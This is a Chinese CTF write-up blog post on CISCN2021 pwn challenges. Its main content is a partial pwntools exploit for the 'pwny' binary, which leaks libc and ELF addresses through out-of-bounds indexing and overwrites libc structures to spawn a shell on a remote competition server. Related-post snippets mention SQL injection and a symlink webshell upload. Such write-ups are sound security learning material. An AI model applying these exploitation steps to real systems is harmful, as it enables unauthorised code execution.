【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3

最新推荐文章于 2023-06-04 17:03:46 发布
最新推荐文章于 2023-06-04 17:03:46 发布
阅读量760 收藏
点赞数
分类专栏: CTF题解 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arttnba3/article/details/117097191
版权
这篇博客分享了作者参加CISCN2021初赛的PWN题解经验,涉及pwny、lonelywolf和channel三个题目。pwny利用负数补码读取libc和elf基址,通过ROP构造环境变量。lonelywolf通过编辑移除key绕过double free检测。channel由于aarch64的qemu问题未深入,而silverwolf使用syscall绕过seccomp。
摘要由CSDN通过智能技术生成

【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3

GITHUB BLOG ADDR

0x00.绪论

国赛初赛划水,原本今年想摸了的(毕竟协会历来人丁稀少,能组出两个队去打就不错了,👴也没必要再勉强整第三个队,反正最后进去的就两个队,现在也不保研了,那就摸了算了),后面想想还是简单去康康今年360会不会像去年ylb那样拉跨,于是又抱上了囧姐姐和茜茜以及jchen三位带师傅的大腿组了一个摸🐟小队,结果比赛当天不知道为什么总之就是只有👴出了三道pwn,整到后面👴也没心思做了,再加上冲刺卷最后一题是LLVM,👴冲个🐓⑧,摸了,反正👴这队也不是主力队

以下 write up 主要摘自比赛当天队内的协作文档,以及👴感觉pwn好没用啊,还不如早点转web算了

0x01.场景实操 开场卷

pwny | Done

一跑起来就 SIGSEGV,给👴整不会了,啥情况啊(暂时还没看IDA)

两个功能 read 和 write,但是 read 会直接 SIGSEGV ?

原来从 /dev/urandom 随机数发生器里读,read 好像读的事下标,那读歪了自然就直接 segmentation fault 了,但是👴好像妹法输入啊

read和 write 的 fd 都在 bss 上,write 改下标 256 两次就能把 fd 改成0

int64,那就整个负数补码让read往前读到 stdout,泄露 libc

再往前还能读到 elf 加载基址,这事ao的

可以任意地址写了,怎么写?写多少?👴一问三不知

environ在栈上构造ROP,但是总之就是很玄学一直没法通,后面莫名其妙又通了…

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
p_name = './pwny'
p = remote('124.71.239.124', 21662)#process(p_name)#
e = ELF(p_name)
libc = ELF('./libc-2.27.so')
one_gadget = [0x4f3d5, 0x4f432, 0x10a41c]
#CISCN{NulFy-zU4JD-NolhS-M0ah5-Df8W5-}

def cmd(command:int):
    p.recvuntil(b"Your choice:")
    p.sendline(str(command).encode())

def read(index):
    cmd(1)
    p.recvuntil(b"Index:")
    p.send(index)
    p.recvuntil(b'Result: ')

def write(index:int, content):
    cmd(2)
    p.recvuntil(b"Index:")
    p.sendline(str(index).encode())
    if content != None:
        p.send(content)

def exp():
    write(256, None)
    write(256, None)
    read(b'\xf8\xff\xff\xff\xff\xff\xff\xff')
    stdout_leak = int(b'0x' + p.recvuntil(b'\n', drop = True), 16)
    libc_base = stdout_leak - libc.sym['_IO_2_1_stdout_']
    log.success('libc base: ' + hex(libc_base))
    read(b'\xf5\xff\xff\xff\xff\xff\xff\xff')
    elf_leak = int(b'0x' + p.recvuntil(b'\n', drop = True), 16)
    elf_base = elf_leak - 0x202008
    log.success('elf base: ' + hex(elf_base))
    write((libc_base - (elf_base + 0x202060) + libc.sym['_IO_2_1_stderr_'])//8, b'/bin/sh\x00')
    write((libc_base - (elf_base + 0x202060) + libc.sym['_IO_2_1_stderr_'] + 0x28)//8, p64(libc_base + libc.sym['system']))
    read(p64((libc_base - (elf_base + 0x202060) + libc.sym['__environ'])
最低0.47元/天 解锁文章
arttnba3
关注
专栏目录
CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3
arttnba3的博客
04-05 1039
CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3[github blog addr there](https://arttnba3.cn/2020/09/08/CTF-0X00-BUUOJ-PWN/)VNCTF2021 - Pwn[VNCTF 2021]White_Give_Flag - read out of bounds[VNCTF 2021]ff - tcache poisoning + IO\_FILE hijackglibc2.32下tca
CTF题解NO.00006】*CTF2021 - pwn - write up by arttnba3
arttnba3的博客
01-23 643
github blog addr 【CTF题解NO.00006】*CTF2021 - pwn - write up by arttnba3[github blog addr](https://arttnba3.cn/2021/01/20/CTF-0X03-STARCTF2021-PWN/)0x00.绪论0x01.babyheap - Use After Free + tcache poisoning0x02.babygame - double free + tcache poisoning0x03.baby
2021 ciscn 线上 pwn pwny
yongbaoii的博客
08-23 317
保护拉满。 两个功能,read write read 202860放了一个随机数。 read把随机数当作文件fd。 write 也是一个read函数,fd是刚刚那个随机数。 但是这里的write显然index可以随便写,就会有个越界。 我们可以把fd文件号改成从文件中读出来的这个数,但是我们想让他为0,但是显然不大行,因为你不知道这个数是多少 当我们两次write的改fd,第一次fd改成一个比较大的数,第二次就会导致读取失败,所以v2的值不会变,利用的是这种巧妙的手法,来让fd等于0. 接下来就是利.
ciscn2021 pwn-pwny
z1r0的博客
05-16 442
ciscn2021 pwn-pwny 查看保护 程序初始化的时候fd取的是一个随机数 所以在程序运行的时候直接read的时候会出错,因为找的是无效内存。所我们需要将fd变成0就可以正常使用read这个东西了。 在这里有个很明显的漏洞,没有限制index,所以可以oob利用。 攻击思路:fd变成0才可以正常利用,看一下202060有什么地址可以让oob发挥作用。 fd刚好就在202060这里,所以我们直接利用oob将fd给覆盖成0。 fd为0之后可以正常的读地址了,借助read功能读取libc和pi
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
2021 ciscn-pwn 初赛
csdn546229768的博客
06-05 591
2021全国大学生信息安全竞赛-pwny_init 分析 mainreadwrite这个程序其实就是两个核心函数,和名字一样,因为操作的fd指针是个随机参数文件,我们通过修改fd指针为0,也就是控制台就可以实现任意读写了,那么程序就简单了很简单我们看这个这里组的偏移是由我们决定的且没有大小限制(是int64类型的变量)。ok看看bss段qword_202060和随机函数的fd指针只相差0x100偏移,那么就可以间接的控制fd为0了,具体利用如下: 这里就可以将fd置为0,我也是gdb调试调试着就发现的,仔细
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 889
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
ciscn2021 pwn-lonelywolf
z1r0的博客
05-19 232
ciscn2021 pwn-lonelywolf 简单题 保护全开 有一个很明显的uaf漏洞 add还限制了大小 攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。 第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。 因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用ua
CISCN2021初赛CTF360)——glass
yhfgs的博客
05-31 412
1.得到glass.apk文件,丢到JEB中,发现关键在so文件中。 2.把apk文件改扩展名,变为压缩文件(我改的zip),解压找到so文件。
CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 817
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
CTF题解NO.00003】moeCTF 2020 - official write up by arttnba3
arttnba3的博客
11-20 4612
github pages blog addr 文章目录[github pages blog addr](https://archive.next.arttnba3.cn/2020/09/07/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x03%E3%80%91moeCTF2020-write-up-by-arttnb3/)0x00.绪论0x01.PwnPwn从入门到入狱WelcomeBaby Pwn - ret2textBaby Shellcode - shellcodeunusual
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 869
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
2021国赛CISCN 初赛 部分RE writeup
weixin_45803474的博客
09-14 423
glass 题目名称:glass 题目描述:Reverse sign in,flag形式为"CISCN{XXXXX}" 首先查看apk 界面如下 用AndroidKiller打开,反编译成java源码 这里只是声明了一下checkflag函数 要去native-lib里找 分析\glass\Project\lib\armeabi-v7a中的libnative-lib.so IDA打开 怀疑是RC4加密 参考 https://www.cnblogs.com/SunsetR/p/12247041.html
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1390
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
ciscn_pwn_lonlywolf
Torebtr的博客
05-22 454
ciscn复现 太菜了,比赛的时候啥也不会,还要肝材料,写到两点,网速也差到爆,实在写不下去了,队友去hw了,分区赛也没进,好好复现,争取下次取得好成绩吧。。。。。 文章目录**ciscn复现****pwn**:*ciscn_2021_lonelywolf*函数分析1、allocate**2、edit函数****3、show****4、delete**解题思路:exp: pwnciscn_2021_lonelywolf 函数分析 题目整体来说不难,常规菜单题,然后进行函数分析(函数已重命名)。而且给了l
CISCN部分WP
qq_51425032的博客
05-17 1072
(1)easy_sql 打开环境,是一个登录界面,因为直接告诉了是sql注入,那么就先测试注入点是哪个 然后可以测试出注入点为psswd 用bp抓包老样子然后保存在本地 sqlmap扫库 sqlmap -r 2.txt --dbs 跑到数据名为:security 然后跑表, sqlmap -r 2.txt -D security -tables 发现有两张表user和`flag,没办法继续按常用的方法进行解题,因此表名无法直接爆出来,但是可以进行猜测表明然后根据无列名...
ciscn 2023 初赛 pwn StrangeTalkBot
z1r0的博客
06-02 623
这里坑点是sint64和int64,导致如果用int64需要把index*2,用int64死活不能成功。uaf,然后可以edit,但是需要写一个proto,然后生成一下序列化python文件。生成之后导入到exp中,正常的2.31 orw利用。
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 904
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
CTFSHOW国赛复现-----Unzip(软连接利用)
最新发布
qq_73767109的博客
06-04 2400
因为解压的目录更改了,所以要把解压文件所在目录放在var/www/html(因为html目录下是web环境)这样才能在解压shell文件时实现getshell。这里利用linux构造软连接使得上传文件指向到var/www/html目录下。接下来就是在var/www/html目录下上传一个shell文件就可以了。再上传该压缩包,因为解压后的目录同名所以会覆盖原指定目录。所以此时目录是var/www/html/cmd.php。在test的目录下创建一句话php文件。--symlinks表示压缩软连接。
2019 CTF题目下载及Write-up解析
CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx 本文档主要是关于CTF安全大赛的题目下载和write up,涵盖了多个题目和解题步骤。 **CTF安全大赛** CTF(Capture The Flag)是指在网络安全领域中...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值